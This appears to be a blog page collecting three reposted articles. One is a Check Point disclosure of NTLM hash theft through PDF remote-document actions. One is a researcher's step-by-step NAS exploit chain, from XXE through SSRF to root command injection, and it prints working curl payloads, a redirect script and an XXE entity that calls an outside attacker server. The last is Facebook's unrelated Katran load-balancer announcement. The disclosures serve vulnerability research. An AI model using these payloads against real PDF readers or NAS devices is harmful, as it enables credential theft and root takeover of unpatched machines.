NTLM Credentials Theft via PDF Files

( Original text by research.checkpoint.com )

Just a few days after it was reported that malicious actors can exploit a vulnerability in MS outlook using OLE to steal a Windows user’s NTLM hashes, the Check Point research team can also reveal that NTLM hash leaks can also be achieved via PDF files with no user interaction or exploitation.

According to Check Point researchers, rather than exploiting the vulnerability in Microsoft Word files or Outlook’s handling of RTF files, attackers take advantage of a feature that allows embedding remote documents and files inside a PDF file. The attacker can then use this to inject malicious content into a PDF and so when that PDF is opened, the target automatically leaks credentials in the form of NTLM hashes.

PDF Background

A PDF file consists primarily of objects, together with Document structure, File structure, and content streams. There are eight basic types of objects:

  • Boolean values
  • Integers and real numbers
  • Strings
  • Names
  • Arrays
  • Streams
  • The null object
  • Dictionaries

A dictionary object is a table containing pairs of objects, called entries.  The first element of each entry is the key and the second element is the value. The key must be a name, and the value may be any kind of object, including another dictionary. The pages of a document are represented by dictionary objects called page objects.  The page objects consist of several required and optional entries.

Proof of Concept

The /AA entry is an optional entry defining actions to be performed when a page is opened (/O entry) or closed (/C entry).  The /O (/C) entry holds an action dictionary. The action dictionary consists of 3 required entries: /S, /F, and /D:

  • /S entry: Describes the type of action to be performed. The GoTo action changes the view to a specified destination within the document. The action types GoToR, (Go To Remote) and GoToE (Go To Embedded), both vulnerable, jump to destinations in another PDF file.
  • /F entry: Exists in GoToR and GoToE, and has slightly different meanings for each. In both cases it describes the location of the other PDF. Its type is file specification.
  • /D entry: Describes the location to go to within the document.

By injecting a malicious entry (using the fields described above together with his SMB server details via the “/F” key), an attacker can entice arbitrary targets to open the crafted PDF file which then automatically leaks their NTLM hash, challenge, user, host name and domain details.

Figure 1: PoC – Injected GoToE action.

In addition, from the target’s perspective there is no evidence or any security alert of the attacker’s activity, which makes it impossible to notice abnormal behavior.

Figure 2: The crafted PDF file has no evidence of the attacker’s actions.

The NTLM details are leaked through the SMB traffic and sent to the attacker’s server which can be further used to cause various SMB relay attacks.

Figure 3: The Leaked NTLM details after the crafted PDF is opened.

 

Affected Products and Mitigation

Our investigation lead us to conclude that all Windows PDF-viewers are vulnerable to this security flaw and will reveal the NTLM credentials.

Disclosure

The issue was disclosed both to Adobe and Foxit.

Foxit indeed fixed the issue as part of 9.1 release.

Adobe fixed the vulnerability as part of the Adobe Reader version released in May (CVE-2018-4993).

IPS Prevention

Check Point customers are protected by the IPS protection:

Multiple PDF readers NTLMv2 Credential Theft

We would also like to thank our colleagues, Assaf Baharav, Yaron Fruchtmann, and Ido Solomon for their help in this research.

Реклама

zero-day RCE crafted from a tricky XXE, affecting millions of users on NetGear Stora, SeaGate Home, & Medion LifeCloud NAS

( Original text by Paulos Yibelo )

L,DR; not a while ago, right after hearing California is raising its eyebrows on internet-connected device security, Daniel Eshetu and I were exploring the current security state of popular Network Attached Storage (NAS) devices. The California Consumer Privacy ACT,which influenced such measures requires manufacturers to have hardened and above-average enterprise security, enforcing much interesting and unusual care for devices; mainly the so called internet-connected “IoT” devices. In my opinion it should be mandatory to have such security standards for devices that spread so rapidly, especially if they are are mandated correctly and put manufactures on the spot for not caring.

So while dissecting the firmware of the first NAS, it became clear we weren’t dealing with one of those easy-to-compromise kumbaya codebases. Axentra had clean code, no obvious backdoors and even had proper security measures in case something should go wrong. Looking online, ~2 million online NAS can be found. Interesting target, well-spread, good codebase. Our research was supported by the privacy advocate WizCase.

This is a prolonged post detailing how it was possible to craft an RCE exploit from a tricky XXE and SSRF.

About Axentra.

Axentra Hipserv is a NAS OS that runs on multiple devices including NetGear Stora, SeaGate Home, Medion LifeCloud NAS and provides cloud-based login, file storage, and management functionalities for different devices. It’s used in different devices from different vendors. The company provides a firmware with a web interface that mainly uses PHP as a backend. The web interface has a rest API endpoint and a pretty typical web management interface with file manager support.

Firmware Analysis.  

After extracting the firmware using binwalk, the backend source were located in /var/www/html/with the webroot in /var/www/html/html. The main handler for the web interface ishomebase.php, and RESTAPIController.php is the main handler for the rest API. All the php files were encoded using IONCube which has a public decoder, and given the version used was an old one, decoding the files didn’t take long.

Once the files were decoded we proceeded to look at the source code, most of it was well written. During the initial analysis we looked at different configuration files which we thought might come into play. One of them was php.ini located in /etc which contained the configuration line ‘register_globals=on’, this was pretty exciting as turning register_globals on is a very insecure configuration and could lead to a plethora of vulnerabilities. But looking through the entire source code, we could not find any chunk of code exploitable through this method. The Axentra code as mentioned before was well written and variables where properly initialized, used and carefully checked, so register_globals was not going to work.

As we kept looking through the source code and moved on to the REST-API endpoint things got a little more interesting, the initial requests are routed through RESTAPIController.phpwhich loads proper classes from /var/www/html/classes/REST and the service classes were in/var/www/html/classes/REST/services in individual folders. While looking through the services most of them were properly authenticated, but there were a few exceptions that were not, one of these was the request aggregator endpoint located at/www/html/classes/REST/services/aggregator in the filesystem and/api/2.0/rest/aggregator/xml from the web url. We will look at how this service works and how we were able to exploit it.

The first file in the directory was AxAggregatorRESTService.php. This file defines and constructs the rest service. Files of the same structure exist in every service directory with different names ending with the same RESTService.php suffix. In this file there were interesting lines (shown below). Note that line numbers might be inaccurate since the files were decoded and we didn’t bother to remove the header generated by the decoder (a block of comment at the beginning of each file plus random breaks).

JUICE A: /var/www/html/classes/REST/services/aggregator/AxAggregatorRESTService.php

line 13: private $requiresAuthenticatedHipServUser = false//This shows the service does not require authentication.
line 14: private $serviceName = ‘aggregator’; //the service name..

line 1718:
if (( count( $URIArray ) == 1 && $URIArray[0] == ‘xml’ )) { // If number of uri paths passed to the service is 1 and the first path to the service is xml
                $resourceClassName = $this->loadResourceClass( ‘XMLAggregator’ ); // Load a resource class XMLAggregator

The code on line 18 calls a function called loadResourceClass with is provided by axentras RESTAPI framework and loads a resource (service handler) class/file from the current rest services directory after adding the appropriate prefix (Ax) and suffix (RESTResource.php). The code for this function is shown below.

classes/REST/AxAbstractRESTService.php

line 2530:
function loadResourceClass($resourceName) {
$resourceClassName = ‘Ax’ . $this->resourcesClassNamePrefix . ucfirst( $resourceName ) .‘RESTResource’;
require_once( REST_SERVICES_DIR . $this->serviceName . ‘/’ . $resourceClassName .‘.php’ );
return $resourceClassName;
}
}

The next file we had to look at was AxXMLAggregatorRESTResource.php which is loaded and executed by the REST framework. This file defines the functionality of the REST API endpoint, inside of it is where our first bug was found (XXE). Let’s take a look at the code.

/var/www/html/classes/REST/services/aggregator/AxXMLAggregatorRESTResource.php

line 14:
DOMDocument $mDoc = new DOMDocument(); //Intialize a DOMDocument loader class

line 16:
if (( ( ( $requestBody == » || !$mDoc->loadXML( $requestBody, LIBXML_NOBLANKS ) ) ||!$mRequestsNode = $mDoc->documentElement ) || $mRequestsNode->nodeName != ‘requests’)) {
AxRecoverableErrorException;
throw new ( null, 3 );
}

Now as you can see on the 16th line this file loads xml from the user without validation. Now most php programmers and security researchers would argue this is not vulnerable since external entity loading is disabled in libxml by default and since our code has not called

libxml_disable_entity_loader(false), but one thing to note here is the Axentra firmware uses the libxml library to parse xml data, and libxml started disabling external entity loading by default starting from libxml2 version 2.9 but Axentras firmware has version 2.6 which does not have external entity loading disabled by default, and this leads to an XXE attack, the following request was used to test the XXE.

curl command with output:

Command:

curl kd ‘<?xml version=»1.0″?><!DOCTYPE requests [ <!ELEMENT request (#PCDATA)> <!ENTITY % dtd SYSTEM «http://SolarSystem:9091/XXE_CHECK»> %dtd; ]> <requests> <request href=»/api/2.0/rest/3rdparty/facebook/» method=»GET»></request> </requests>’http://axentra.local/api/2.0/rest/aggregator/xml

Output:

<?xml version=»1.0″?>
<responses>
<response method=»GET» href=»/api/2.0/rest/3rdparty/facebook/»>
<errors><error code=»401″ msg=»Unauthorized»/></errors>
</response>
</responses>%

which produced the following on out listening server:

root@Server:~# nc -lvk 9091
Listening on [0.0.0.0] (family 0, port 9091)
Connection from [axentra.local] port 9091 [tcp/*] accepted (family 2, sport 41528)
GET /XXE_CHECK HTTP/1.0
Host: SolarSystem:9091

^C
root@Server:~#

Now that we had XXE working, we could try and read files and try to dig out sensitive info, but ultimately we wanted full remote control. The first thought was to extract the sqlite database containing all usernames and passwords, but this turned out to be a no go since xxe and binary data don’t work so well together, even encoding the data using php filters would not work. And since this method would have required another RCE in the webinterface to take full control of the device, we thought of trying something new.

Since we could make a request from the device (SSRF), we tried to locate endpoints that bypass authentication if the request came from localhost (very common issue/feature?). However, we could not find any good ones and so we moved into the internals of the NAS system specifically how the system executes commands as root (privileged actions). Now this might have not been something to look at if the user-id the web server is using had some sort of sudo privilege, but this was not the case. And since we saw this during our initial overlook of the firmware we knew there was another way the system was executing commands. After a few minutes of searching we found a daemon that the system used to execute commands and found php scripts that communicate with this daemon. We will look at the details below.

The requests to this daemon are sent using xml format and the file is located in/var/www/html/classes/AxServerProxy.php, which calls a function named systemProxyRequestto send the requests. The systemProxyRequest is located in the same file and the code is given below.

/var/www/html/classes/AxServerProxy.php:

line 15641688:
function systemProxyRequest($command, $operation, $params = array(  ), $reqData = ») {
$Proc = true;
$host = ‘127.0.0.1’;
$port = 2000;
$fp = fsockopen( $host, $port, $errno, $errstr );
if (!$fp) {
AxRecoverableErrorException;
throw new ( ‘Could not connect to sp server’, 4 );
}
if ($Proc) {
unset( $root );
DOMDocument;
$doc = new ( ‘1.0’ );
$root = $doc->createElement( ‘proxy_request’ );
$cmdNode = $doc->createElement( ‘command_name’ );
$cmdNode->appendChild( $doc->createTextNode( $command ) );
$root->appendChild( $cmdNode );
$opNode = $doc->createElement( ‘operation_name’ );
$opNode->appendChild( $doc->createTextNode( $operation ) );
$root->appendChild( $opNode );

if ($reqData[0] == ‘<‘) {
if (substr( $reqData, 0, 5 ) == ‘<?xml’) {
$reqData = preg_replace( ‘/<\?xml.*?\?>/’, », $reqData );
}

DOMDocument;
$reqDoc = new (  );
$reqData = str_replace( », », $reqData );
$reqDoc->loadXML( $reqData );
$mNewNode = $doc->importNode( $reqDoc->documentElement, true);
$dNode->appendChild( $mNewNode );
}
….
$root->appendChild( $dNode );
}
if ($root) {
$doc->appendChild( $root );
fputs( $fp, $doc->saveXML(  ) . » );
}

$Resp = »;
stream_set_timeout( $fp, 120 );
while (!feof( $fp )) {
$Resp .= fread( $fp, 1024 );
$info = stream_get_meta_data( $fp );

if ($info[‘timed_out’]) {
return array( ‘return_code’ => ‘FAILURE’, ‘description’ => ‘System Proxy Timeout’, ‘error_code’ => 4, ‘return_message’ => », ‘return_value’ => » );
}
}

As clearly seen above the function takes xml data and cleans out a few things like spaces and sends it to the daemon listening on port 2000 of the local machine. The daemon is located at/sbin/oe-spd and is a binary file, so we looked into it using IDA, the following pieces of code were generated by the Hex-Rays decompiler in IDA.

in function sub_A810:

This function receives the data from the socket as an argument (a2) and parses it.

JUICE B:

signed int __fastcall sub_A810(int a1, const char **a2) line 52:

v10 = strstr(*v3, «<?xml version=\»1.0\»?>»); // strstr skips over junk data until requested string is found (<?xml version=1.0 ?>)

The line above is important to us mainly because the request is sent through the HTTP protocol so the daemons «feature» to skip over the junk data allows us to embed our payload in an http request to http://127.0.0.1:2000 (the daemons port) without worrying about formatting or the daemon bailing because of unknown characters; it does the same thing with junk data after the xml too.

Now, we skipped over looking into how the whole oe-spd daemon code works, mainly because we had our sights set on finding and exploiting a simple RCE bug, and we had all we need to test out a few ways we could go about achieving that, we had the format of the messages fromAxServerProxy.php and some from usr/lib/spd/scripts/. The method we used to find the RCE was sending the request through curl, and tracing the process with strace while running in a qemu environment, this helped us filter out execve calls with the right parameters to use as a payload. As a note there were A LOT of vulnerable functions in this daemon, but in the following we only show the one we used to achieve RCE. The interested one’s among you can explore the daemon using the hints we gave above.

curl command and response:

curl -vd ‘<?xml version=»1.0″?><proxy_request><command_name>usb</command_name><operation_name>eject</operation_name><parameter parameter_name=»disk»>BOGUS_DEVICE</parameter></proxy_request>’ http://127.0.0.1:2000/
*   Trying 127.0.0.1…
* TCP_NODELAY set
* Connected to 127.0.0.1 (127.0.0.1) port 2000 (#0)
> POST / HTTP/1.1
> Host: 127.0.0.1:2000
> User-Agent: curl/7.61.1
> Accept: */*
> Content-Length: 179
> Content-Type: application/x-www-form-urlencoded
>
* upload completely sent off: 179 out of 179 bytes

<?xml version=»1.0″?>
<proxy_return>
<command_name>usb</command_name>
<operation_name>eject</operation_name>
<proxy_reply return_code=»SUCCESS» description=»Operation successful» />
</proxy_return>

strace command and output

sudo strace -f -s 10000000 -q -p 2468 -e execve
[pid  2510] execve(«/usr/lib/spd/usb», [«/usr/lib/spd/usb»], 0x63203400 /* 22 vars */ <unfinished …>
[pid  2511] +++ exited with 0 +++
[pid  2510] <… execve resumed> )      = 0
[pid  2513] execve(«/bin/sh», [«sh», «-c», «/usr/lib/spd/scripts/usb/usbremoveall /dev/BOGUS_DEVICE manual»], 0x62c67f10 /* 22 vars */ <unfinished …>
[pid  2514] +++ exited with 0 +++
[pid  2513] <… execve resumed> )      = 0
[pid  2513] execve(«/usr/lib/spd/scripts/usb/usbremoveall», [«/usr/lib/spd/scripts/usb/usbremoveall», «/dev/BOGUS_DEVICE», «manual»], 0x62a65800 /* 22 vars */ <unfinished …>
[pid  2515] +++ exited with 0 +++
[pid  2513] <… execve resumed> )      = 0
[pid  2517] execve(«/bin/sh», [«sh», «-c», «grep /dev/BOGUS_DEVICE /etc/mtab»], 0x63837f80 /* 22 vars */ <unfinished …>
[pid  2518] +++ exited with 0 +++
[pid  2517] <… execve resumed> )      = 0
[pid  2517] execve(«/bin/grep», [«grep», «/dev/BOGUS_DEVICE», «/etc/mtab»], 0x64894000 /* 22 vars */ <unfinished …>
[pid  2519] +++ exited with 0 +++
[pid  2517] <… execve resumed> )      = 0
[pid  2520] +++ exited with 1 +++
[pid  2517] +++ exited with 1 +++
[pid  2513] — SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=2517, si_uid=0, si_status=1, si_utime=4, si_stime=3} —
[pid  2516] +++ exited with 1 +++
[pid  2513] +++ exited with 1 +++
[pid  2510] — SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=2513, si_uid=0, si_status=1, si_utime=16, si_stime=6} —
[pid  2512] +++ exited with 0 +++
[pid  2510] +++ exited with 0 +++
[pid  2508] — SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=2510, si_uid=0, si_status=0, si_utime=4, si_stime=1} —
[pid  2509] +++ exited with 1 +++
[pid  2508] +++ exited with 1 +++

the command execution bug should be clearly visible here, but in case you missed it, the 4th line in the strace output shows out input (BOGUS_DEVICE) being passed to a /bin/sh call, now we send a test injection to see if our command execution works.

curl command and output:

curl -vd ‘<?xml version=»1.0″?><proxy_request><command_name>usb</command_name><operation_name>eject</operation_name><parameter parameter_name=»disk»>`echo pwnEd`</parameter></proxy_request>’ http://127.0.0.1:2000/

<?xml version=»1.0″?>
<proxy_return>
<command_name>usb</command_name>
<operation_name>eject</operation_name>
<proxy_reply return_code=»SUCCESS» description=»Operation successful» />
</proxy_return>

Strace output:

[pid  2550] execve(«/usr/lib/spd/usb», [«/usr/lib/spd/usb»], 0x63203400 /* 22 vars */ <unfinished …>
[pid  2551] +++ exited with 0 +++
[pid  2550] <… execve resumed> )      = 0
[pid  2553] execve(«/bin/sh», [«sh», «-c», «/usr/lib/spd/scripts/usb/usbremoveall /dev/`echo pwnEd` manual»], 0x6291cf10 /* 22 vars */ <unfinished …>

If you take a close look of the output, it can be seen that «echo pwnEd» command we gave in backticks has been evaluated and the output is being used as a part of a later command. To make this PoC simpler, we just write a file in /tmp and see if it exists in the device.

curl -vd ‘<?xml version=»1.0″?><proxy_request><command_name>usb</command_name><operation_name>eject</operation_name><parameter parameter_name=»disk»>dev_`id>/tmp/pwned`</parameter></proxy_request>’ http://127.0.0.1:2000/

Now we have complete command execution. In order to chain this bug with our XXE and SSRF we have to make the xml parser send a request to http://127.0.0.1:2000/ with the payload. Although sending a normal http request to the daemon was not a problem, things fell apart when we tried to append the payload as a url location in the xml file, the parser failed with an error (Invalid Url) so we had to change our approach. After a few failed attempts we figured out the libxml http client correctly follows 301/2 redirections and this does not make the parser fail since the url given in the redirection does not pass through the same parser as the initial url in the xml data, so we created a little php script to redirect the libxml http client to http://127.0.0.1:2000/ with the payload embedded as a url path. The script is shown below.

redir.php:

<?php
if(isset($_GET[‘red’]))
{
header(‘Location: http://127.0.0.1:2000/a.php?d=<?xml version=»1.0″?><proxy_request><command_name>usb</command_name><operation_name>eject</operation_name><parameter parameter_name=»disk»>a`id>/var/www/html/html/pwned.txt`</parameter></proxy_request>»»‘); //302 Redirect

}
?>

Then we ran this on our server the commands we used and the final

output is given below.

curl command and output:

curl -kd ‘<?xml version=»1.0″?><!DOCTYPE requests [ <!ELEMENT request (#PCDATA)> <!ENTITY % dtd SYSTEM «http://SolarSystem:9091/redir.php?red=1″> %dtd; ]> <requests> <request href=»/api/2.0/rest/3rdparty/facebook/» method=»GET»></request> </requests>’ http://axentra.local/api/2.0/rest/aggregator/xml
<?xml version=»1.0″?>
<responses>
<response method=»GET» href=»/api/2.0/rest/3rdparty/facebook/»>
<errors><error code=»401″ msg=»Unauthorized»/></errors>
</response>
</responses>%

root@Server:~# php -S 0.0.0.0:9091
PHP 7.0.32-0ubuntu0.16.04.1 Development Server started at Thu Nov  1 16:02:16 2018
Listening on http://0.0.0.0:9091
Document root is /root/…
Press Ctrl-C to quit.
[Thu Nov  1 16:02:43 2018] axentra.local:39248 [302]: /redir.php?red=1

As seen above the php script sent a 302 (Found) response to the libxml http client which should redirect it to http://127.0.0.1:2000/a.php?d=<?xml version=»1.0″?><proxy_request><command_name>usb</command_name><operation_name>eject</operation_name><parameter parameter_name=»disk»>a`id>/var/www/html/html/pwned.txt`</parameter></proxy_request>»»

The above redirection should execute our command injection and create a pwned.txt file in the webroot with the output of id, the following request checks the output and existence of the file.

curl command and output:

curl -k http://axentra.local/pwned.txt
uid=0(root) gid=0(root)

Yay! our pwned.txt has been created and the exploit was successful. We have a video demo showing the full exploit chain from XXE to SSRF to RCE being used to create a reverse root shell. We will post the video and the exploit code soon.

Timeline

This research was the basis of us looking into more NAS devices, like WD MyBook and discovering multiple critical root RCE vulnerabilities that ultimately impacted millions of devices from western countries were published on our research published on WizCase blog here. Unfortunately, Axentra, the affected devices, and even WD, chose silence. Some have responded saying there will NOT BE any patches for the vulnerabilities affecting millions!

This is where, soon in the future, the enforced involvement of laws like The California Consumer Privacy ACT can come to play by holding manufactures responsible for their actions, in this case, at-least regarding patching!

Open-sourcing Katran, a scalable network load balancer (Facebook libs)

With billions of people around the globe using Facebook services, our infrastructure engineers have created a range of systems to optimize traffic and to enable fast, reliable access for everyone. Today, we are open-sourcing a component of this work by releasing the Katran forwarding plane software library, which powers the network load balancer used in Facebook’s infrastructure. Katran offers a software-based solution to load balancing with a completely reengineered forwarding plane that takes advantage of two recent innovations in kernel engineering: eXpress Data Path (XDP) and the eBPF virtual machine. Katran is deployed today on backend servers in Facebook’s points of presence (PoPs), and it has helped us improve the performance and scalability of network load balancing and reduce inefficiencies such as busy loops when there are no incoming packets. By sharing it with the open source community, we hope others can improve the performance of their load balancers and also use Katran as a foundation for future work.

The challenge of serving requests at Facebook scale

To manage traffic at Facebook scale, we have deployed a globally distributed network of points of presence to act as proxies for our data centers. Given the extremely high volume of requests, both PoPs and data centers confront the challenge of making the large fleet of (backend) servers appear as a single virtual unit to the outside world and also distributing the workload efficiently among those backend servers.

These challenges are typically addressed by announcing a virtual IP address (VIP) to the internet at each location. Packets destined to the VIP are then seamlessly distributed among the backend servers. The distribution algorithm, however, needs to account for the fact that the backend servers typically operate at an application layer and terminate the TCP connections. This responsibility is handled by a network load balancer (often called a layer 4 load balancer, or an L4LB, because it operates on packets rather than serving application level requests). Figure 1 illustrates the role of an L4LB in relation to the other network components.

Figure 1: A network load balancer fronts several backend servers running a backend application and consistently sends all packets from each client connection to a unique backend server.

Requirements for a high-performance load balancer

An L4LB’s performance is especially important for managing latency and scaling the number of backend servers, because the L4LBs are on a path that needs to process every incoming packet. Performance is typically measured as peak packets per second (pps) that the L4LB can process. Traditionally, engineers have preferred hardware-based solutions for this task because they typically use accelerators such as application-specific integrated circuits (ASICs) or field-programmable gate arrays (FPGAs) to reduce the burden on the main CPU. However, one of the drawbacks of a hardware-centric approach is that it limits the system’s flexibility. To effectively serve Facebook’s needs, a network load balancer must:

  • Run on commodity Linux servers. This allows us to run the load balancer on part or all of the large fleet of currently deployed servers. A software-based load balancer satisfies this criteria.
  • Coexist with other services on a given server. This removes the need for dedicated servers that run the load balancer exclusively, thereby increasing fault tolerance.
  • Allow low-disruption maintenance. Facebook’s software must be able to evolve quickly in order to support new or improved products and services. Maintenance and upgrades are a norm, not exceptions, for the load balancer and backend layers. Minimizing disruption during these events allows us to iterate faster.
  • Offer easy instrumentation and debugging. All large distributed infrastructures must contend with anomalies and unexpected events, so reducing the time to debug and troubleshoot issues is important. The load balancer needs to be instrumentable and friendly to standard tools like tcpdump.

In order to solve for these requirements, we designed a high-performance software network load balancer. The first generation of our L4LB was based on the IPVS kernel module and served Facebook’s needs for well over four years. However, it fell short on the goal of coexistence with other services, specifically the backends. In the second iteration, we leveraged the eXpress Data Path (XDP) framework and the new BPF virtual machine (eBPF) to run the software load balancer together with the backends on a large number of machines. Figure 2 shows the key difference between the two generations.

Figure 2: Differences between the two generations of L4LBs. Note that both are software load balancers running on backend servers. Katran (right) allows us to colocate the load balancer with backend application, thus increasing the load balancer capacity.

Our First-generation L4LB: Building on OSS Software

With our first-generation L4LB, we leaned heavily on existing open source components to implement most of the functionality. This approach helped us replace a hardware-based solution across a large deployment in only a few months. The design has four major components:

  • VIP announcement: This component simply announces the virtual IP addresses that the L4LB is responsible for to the world by peering with the network element (typically a switch) in front of the L4LB. The switch then uses an equal-cost multipath (ECMP) mechanism to distribute packets among the L4LBs announcing the VIP. We used ExaBGP for the VIP announcement because of its lightweight, flexible design.
  • Backend server selection: In order to send all packets from a client to the same backend, the L4LBs use a consistent hash that depends on the 5-tuple (source address, source port, destination address, destination port, and protocol) of the incoming packet. The use of a consistent hash ensures that all packets that belong to a transport connection are sent to the same backend irrespective of the L4LB receiving the packet. This removes the need for any state synchronization across multiple L4LBs. The consistent hash also guarantees minimal disruption to existing connections when a backend leaves or joins the pool of backends.
  • Forwarding plane: Once the L4LB picks the appropriate backend, the packets need to be forwarded to that host. To avoid restrictions such as keeping L4LB and backend hosts on the same L2 domain, we use a simple IP-in-IP encapsulation. This allows us to place L4LB and backend hosts in different racks. We used the IPVS kernel module for the encapsulation. The backends are configured to have the corresponding VIP on their loopback interface. This allows the backend to send packets on the return path directly to the client (instead of the L4LB). This optimization, often called direct server return (DSR), allows the L4LB to be constrained only by the incoming packet volume.
  • Control plane: This component performs various functions, including performing health checks on the backend servers, providing a simple interface (via a configuration file) to add or remove VIPs, and providing simple APIs to examine the state of the L4LB and backend servers. We developed this component in-house.

Each L4LB also stores the backend choice for each 5-tuple as a lookup table to avoid duplicate computation of the hash on future packets. This state is a pure optimization and is not necessary for correctness. This design met several requirements of Facebook’s workload listed above, but there was one major drawback: Colocating the L4LB and a backend on a single host increased the chance of device failure. Even with the local state, the L4LB was a CPU-intensive component. To separate the failure domains, we ran the L4LBs and backend servers on a disjointed set of machines. There were fewer L4LBs than backend servers in this setup, which made the L4LBs more vulnerable to a sudden increase in load. The fact that packets had to traverse the regular Linux network stack before being handled by the L4LB exacerbated the problem.

Figure 3: Overview of our first-generation L4LB. Note that the load balancer and the backend application run on different machines. Different load balancers make consistent decisions without any state synchronization. Using packet encapsulation allows the servers running the load balancer and the backend application to be placed in different racks. In a typical deployment, the ratio of the number of L4LBs to the number of backend application servers is very small.

Katran: Reimagining the forwarding plane

Katran, our second-generation L4LB, significantly improves upon the previous version with a completely reengineered forwarding plane. Two recent developments in the kernel world powered the new design:

  • The XDP provides a fast, programmable network data path without resorting to a full-fledged kernel bypass method and works in conjunction with the Linux networking stack. (A detailed overview of XDP is available here.)
  • The eBPF virtual machine provides a flexible, efficient, and more reliable way to interact with the Linux kernel and to extend its functionality by running user-space supplied programs at specific points in the kernel. eBPF has already brought dramatic improvements to several areas, including tracing and filtering. (More details are available here.)

The overall architecture of the system is similar to that of the first-generation L4LB: First, ExaBGP announces to the world which VIPS a particular Katran instance is responsible for. Second, packets destined to a VIP are sent to Katran instances using an ECMP mechanism. Finally, Katran selects a backend and forwards the packet to the correct backend server. The main differences are in the last step.

Early and efficient packet handling: Katran uses XDP in combination with a BPF program for packet forwarding. When XDP is enabled in driver mode, a packet handling routine (BPF program) is run immediately after a packet is received by the network interface card (NIC) and before the kernel intercepts it. XDP invokes the BPF program on every incoming packet. If the NIC has multiple queues, the program is invoked in parallel for each one them. The BPF program used for handling packets is lockless and uses a per-CPU version of BPF maps. Due to this parallelism, performance scales linearly with the number of the NIC’s RX queues. Katran also supports the “generic XDP” mode (instead of driver mode) of operation, at a performance cost.

Inexpensive and more stable hashing: Katran uses an extended version of the Maglev hash to select the backend server. A few features of the extended hash are resilience to backend server failures, more uniform distribution of load, and the ability to set unequal weights for different backend servers. The last of these is an important feature that allows us to handle hardware refreshes in our PoPs and data centers easily: We can absorb the newer generation hardware by simply setting appropriate weights. Despite its being more expressive, the code for computing this hash is small enough to fit entirely in the L1 cache.

More resilient local state: Katran’s efficiency at handling packets and computing the hash results in an interesting interaction with the local state table. We observed that, quite often, computing the hash is computationally easier than looking up the local state table for the 5-tuple to backend server choice. This is more visible for cases where the local state table lookup traverses all the way to the shared last level cache. In order to take advantage of this phenomenon in a natural way, we implemented the lookup table as an LRU-evicting cache. The LRU cache size is configurable at startup time and acts as a tunable parameter to strike a balance between computation and lookup. We picked these values empirically to optimize for pps. In addition, Katran provides a runtime “compute only” switch to ignore the LRU cache altogether in the event of catastrophic memory pressure on the host.

RSS-friendly encapsulation: Received Side Scaling (RSS) is an important optimization in NICs that aims to spread load across CPUs uniformly by steering packets from each flow to a separate CPU. Katran crafts its encapsulation to work in conjunction with RSS. Instead of using the same outer source for every IP-in-IP packet, packets in different flows (e.g., with different 5-tuples) are encapsulated using a different outer source IP, but packets in the same flow are always assigned the same outer source IP.

Figure 4: Katran enables a fast path for processing packets at high speed without resorting to a full-fledged kernel bypass. Note that the packets cross the kernel/user-space boundary only once. This allows us to colocate the L4LB and backend application without sacrificing performance.

These features dramatically enhance performance, flexibility and scalability of the L4LB. Katran’s design also gets rid of busy loops on receive path barely consuming any CPU if there are no incoming packets. In contrast to a full-fledged Kernel Bypass solution (such as DPDK), using XDP allows us to run Katran alongside any application without any performance penalties on the same host. Katran today runs alongside the backend servers in our PoPs with an improved L4LB-to-backend ratio. This increases resilience to load spikes, host failures, and maintenance, as well. The reengineered forwarding plane was central to this shift. We believe other systems can benefit by using our forwarding plane, so we are open-sourcing our code and including several examples of how to use it to craft an L4LB.

Additional Considerations

Katran operates under certain assumptions and constraints that enable the performance improvements. In practice, we found these constraints to be fairly reasonable, and they did not block our deployment. We believe that most users of our library will find them easy to satisfy. We’ve listed them below:

  • Katran works only in direct service return (DSR) mode.
  • Katran is the component that decides the final destination of a packet addressed to a VIP so the network needs to route packets to Katran first. This requires the network topology to be L3 based, e.g., packets are routed by IP rather than by MAC addresses.
  • Katran cannot forward fragmented packets, nor can it fragment them by itself. This could be mitigated either by increasing the maximal transmission unit (MTU) inside the network or by changing advertised TCP MSS from the backends. (The latter step is recommended even if you have increased the MTU.)
  • Katran doesn’t support packets with IP options set. The maximum packet size cannot exceed 3.5 KB.
  • Katran was built with the assumption that it’s going to be used in a «load balancer on a stick» scenario, where a single interface would be used for traffic both «from user to L4LB (ingress)» and «from L4LB to L7LB (egress).”

Despite these limitations, we believe that Katran offers an excellent forwarding plane to users and organizations who intend to leverage the exciting combination of XDP and eBPF to build efficient load balancers. We look forward to answering any questions from prospective adopters on our GitHub repository — and pull requests are always welcome!